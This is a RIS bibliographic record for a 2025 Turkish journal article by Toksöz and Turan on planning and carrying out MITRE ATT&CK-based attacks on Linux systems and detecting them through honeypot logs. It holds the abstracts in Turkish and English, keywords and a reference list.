        TY  - JOUR
T1  - LİNUX PLATFORMUNDA MITRE ATT&amp;CK MATRİSİ KULLANARAK SALDIRI PLANLAMA VE UYGULAMA
TT  - ATTACK PLANNING AND IMPLEMENTATION USING MITRE ATT&amp;CK MATRIX ON LINUX PLATFORM
AU  - Toksöz, Suat
AU  - Turan, Metin
PY  - 2025
DA  - June
Y2  - 2024
DO  - 10.55071/ticaretfbd.1572294
JF  - İstanbul Ticaret Üniversitesi Fen Bilimleri Dergisi
PB  - İstanbul Ticaret Üniversitesi
WT  - DergiPark
SN  - 1305-7820
SP  - 84
EP  - 134
VL  - 24
IS  - 47
LA  - tr
AB  - Bu makale, Linux platformunda MITRE ATT&amp;CK matrisine dayalı saldırıların planlanması ve uygulanması süreci ele alınmaktadır. MITRE ATT&amp;CK matrisi, siber tehditlere karşı savunma mekanizmalarının güçlendirilmesi amacıyla geliştirilmiş bir çerçeve olarak tanımlanmakta olup, saldırganların teknikleri, taktikleri ve prosedürleri sistematik bir şekilde sınıflandırılmaktadır. Çalışmada, Linux tabanlı sistemlerde bu matris kullanılarak çeşitli saldırı senaryoları oluşturulmakta ve bu senaryoların uygulanabilirliği test edilmektedir. Ayrıca, bu saldırıların tespiti ve önlenmesi için kullanılabilecek yöntemler ve araçlar tartışılmaktadır. Çalışmada, Balküpü üzerinden gelen saldırılara ait loglar toplanmakta, analiz edilmekte ve değerlendirilmektedir. Elde edilen sonuçlar, siber güvenlik uzmanlarının Linux platformlarında karşılaşabilecekleri tehditleri daha iyi anlamalarına ve bu tehditlere karşı etkili savunma stratejileri geliştirmelerine katkı sağlamak amacıyla sunulmaktadır.
KW  - Mitre Att&amp;ck
KW  - Siber Güvenlik
KW  - Saldırı Planlama
KW  - Saldırı Tespiti
KW  - Savunma Stratejileri
N2  - This paper discusses the process of planning and executing attacks based on the MITRE ATT&amp;CK matrix on the Linux platform. The MITRE ATT&amp;CK matrix is defined as a framework developed to strengthen defense mechanisms against cyber threats and systematically classifies attackers&#039; techniques, tactics and procedures. In this study, various attack scenarios are created using this matrix on Linux-based systems and the applicability of these scenarios is tested. Furthermore, methods and tools that can be used to detect and prevent these attacks are discussed. The study collects, analyzes and evaluates the logs of the attacks received through Balküpü. The results are presented in order to help cybersecurity experts better understand the threats they may face on Linux platforms and develop effective defense strategies against these threats.
CR  - Abbas-Escribano, M., &amp; Hervé D. (2023). An Improved Honeypot Model for Attack Detection and Analysis.  ACM International Conference Proceeding Series, doi:10.1145/3600160.3604993.
CR  - Afenu, D. S., Asiri, M. &amp; Saxena, N. (2024). Industrial Control Systems Security Validation Based on MITRE Adversarial Tactics, Techniques, and Common Knowledge Framework. Electronics (Switzerland) 13(5). doi:10.3390/electronics13050917.
CR  - Al-Sada, B., Sadighian, A. &amp; Oligeri, G. (2024). Analysis and Characterization of Cyber Threats Leveraging the MITRE ATT&amp;CK Database. IEEE Access 12. doi:10.1109/ACCESS.2023.3344680.
CR  - Amal, M. R., &amp; P. Venkadesh. (2023). H-DOCTOR: Honeypot based firewall tuning for attack prevention. Measurement: Sensors 25. doi:10.1016/j.measen.2022.100664.
CR  - Andrew, Y, Lim, C. &amp; Budiarto, E. (2022). Mapping Linux Shell Commands to MITRE ATT&amp;CK using NLP-Based Approach.  Proceedings of the International Conference on Electrical Engineering and Informatics, doi:10.1109/ICELTICs56128.2022.9932097.
CR  - Candidate, A., &amp; Ayala, G. (2024). POLITECNICO DI TORINO Master’s Degree in ICT FOR SMART SOCIETIES Honeypot in a box: A distributed cluster network for honeypot deployment Supervisors Prof. Marco MELLIA Prof. Idilio DRAGO.
CR  - Georgiadou, A., Mouzakitis, S., &amp; Askounis, D. (2021). Assessing mitre att&amp;ck risk using a cyber-security culture framework. Sensors 21(9). doi:10.3390/s21093267.
CR  - Hobert, K,. Lim, C. &amp; Budiarto, E. (2023). Enhancing Cyber Attribution through Behavior Similarity Detection on Linux Shell Honeypots with ATT&amp;CK Framework.  Proceedings - 2023 IEEE International Conference on Cryptography, Informatics, and Cybersecurity: Cryptography and Cybersecurity: Roles, Prospects, and Challenges, ICoCICs 2023, doi:10.1109/ICoCICs58778.2023.10276639.
CR  - Hussein, M.A., &amp; Hamza, E.K. (2022). Secure Mechanism Applied to Big Data for IIoT by Using Security Event and Information Management System (SIEM). International Journal of Intelligent Engineering and Systems 15(6). doi:10.22266/ijies2022.1231.59.
CR  - Javadpour, A., Ja’fari, F., Taleb, T., Shojafar, M., &amp; Benzaïd, C. (2024). A comprehensive survey on cyber deception techniques to improve honeypot performance. Computers and Security 140. doi:10.1016/j.cose.2024.103792.
CR  - José, C. &amp; Santander, M. (2024). Learning Models to Detect Personality Traits of Cyber Attackers: A Combined Approach Using Honeypot and Surveys. doi:10.1007/978-3.
CR  - Kovar, R. &amp; Paine, K. (2024). The CISO Report. https://www.splunk.com/en_us/pdfs/gated/ebooks/the-ciso-report.pdf adresinden 16 Kasım 2024 tarihinde alınmıştır.
CR  - Koutsikos, I. (2024). Improving Infrastructure Security using Deceptive Technologies.
CR  - Liao, M.L., Yu, C.L., Lai, Y.C., Chiu, S.P. &amp; Chen, J.L. (2023). An Intelligent Cyber Threat Classification System.  International Conference on Advanced Communication Technology, ICACT, doi:10.23919/ICACT56868.2023.10079405.
CR  - Mitre Att&amp;Ck. (2023). Techniques - Enterprise | MITRE ATT&amp;CK®. Techniques.
CR  - Mohd Fuzi, M. F., Mazlan, M.F., Jamaluddin, M.N.F. &amp; Halim, I.H.A. (2024). Performance analysis of network intrusion detection using T-Pot honeypots. Journal of Computing Research and Innovation 9: 348–60. https://ir.uitm.edu.my/id/eprint/103968 adresinden 16 Kasım 2024 tarihinde alınmıştır.
CR  - Muhammad, S. &amp; Hafee, A.U. (2024) Investigating Threats to ICS and SCADA Systems Via Honeypot Data Analysis and SIEM. https://www.researchgate.net/publication/382398394 adresinden 16 Kasım 2024 tarihinde alınmıştır.
CR  - Mungsing, S. &amp; Sringendee, K. (2024) Developing Proactive Cyber Threat Defense Systems on Server Computers Using Honeypot Techniques. http://www.ijert.org.
CR  - Palmer, D. (2024). Linux malware attacks are on the rise, and businesses aren’t ready for it. https://www.zdnet.com/article/linux-malware-attacks-are-on-the-rise-and-businesses-arent-ready-for-it/ adresinden 16 Kasım 2024 tarihinde alınmıştır.
CR  - Raghul, S. A., Gayathri, G., Bhatt, R. &amp; Varun Kumar, K. A. (2024). Enhancing Cybersecurity Resilience: Integrating IDS with Advanced Honeypot Environments for Proactive Threat Detection.  Proceedings of the 3rd International Conference on Applied Artificial Intelligence and Computing, ICAAIC 2024, Institute of Electrical and Electronics Engineers Inc., 1363–68. doi:10.1109/ICAAIC60222.2024.10575865.
CR  - Rashid, S.M.Z.U, Haq, A., Hasan, S.T., Furhad, M.H., Ahmed, M. &amp; Ullah, A.B. (2024). Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot. Wireless Networks 30(5). doi:10.1007/s11276-022-03057-y.
CR  - Rawat, S. (2024). Enhancing False Positive Detection in IDS/IPS Using Honeypots: A Case Study with CSE-CIC-2018 Dataset.
CR  - Shrivastava, R.K., Bashir, B. &amp; Hota, C. (2019). Attack detection and forensics using honeypot in IoT environment.  Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and Lecture Notes in Bioinformatics), doi:10.1007/978-3-030-05366-6_33.
CR  - Sikandar, H.S., Sikander, U., Anjum, A. &amp; Khan, M.A. (2022). An Adversarial Approach: Comparing Windows and Linux Security Hardness Using Mitre ATT&amp;CK Framework for Offensive Security.  IEEE 19th International Conference on Smart Communities: Improving Quality of Life Using ICT, IoT and AI, HONET 2022, doi:10.1109/HONET56683.2022.10018981.
CR  - Singh, N. &amp; Tripathy, S. (2024). It’s too late if exfiltrate: Early stage Android ransomware detection. Computers and Security 141. doi:10.1016/j.cose.2024.103819.
CR  - Srinivasa, S., Pedersen, L.M. &amp; Vasilomanolakis, E. (2023). Gotta Catch ’em All: A Multistage Framework for Honeypot Fingerprinting. Digital Threats: Research and Practice 4(3). doi:10.1145/3584976.
CR  - Xiong, W., Legrand, E., Åberg, O. &amp; Lagerström, R. (2022). Cyber security threat modeling based on the MITRE Enterprise ATT&amp;amp;CK Matrix. Software and Systems Modeling 21(1): 157–77. doi:10.1007/s10270-021-00898-7.
CR  - Yang, X., Yuan, J., Yang, H., Kong, Y., Zhang, H. &amp; Zhao, J. (2023). A Highly Interactive Honeypot-Based Approach to Network Threat Management. Future Internet 15(4). doi:10.3390/fi15040127.
CR  - Yousaf, A. &amp; Zhou, J. (2024). From sinking to saving: MITRE ATT &amp;CK and D3FEND frameworks for maritime cybersecurity. International Journal of Information Security. doi:10.1007/s10207-024-00812-4.
CR  - Zahid, H., Hina, S., Hayat, M.F. &amp; Shah, G.A. (2023). Agentless Approach for Security Information and Event Management in Industrial IoT. Electronics (Switzerland) 12(8). doi:10.3390/electronics12081831.
UR  - https://doi.org/10.55071/ticaretfbd.1572294
L1  - https://dergipark.org.tr/tr/download/article-file/4309543
ER  -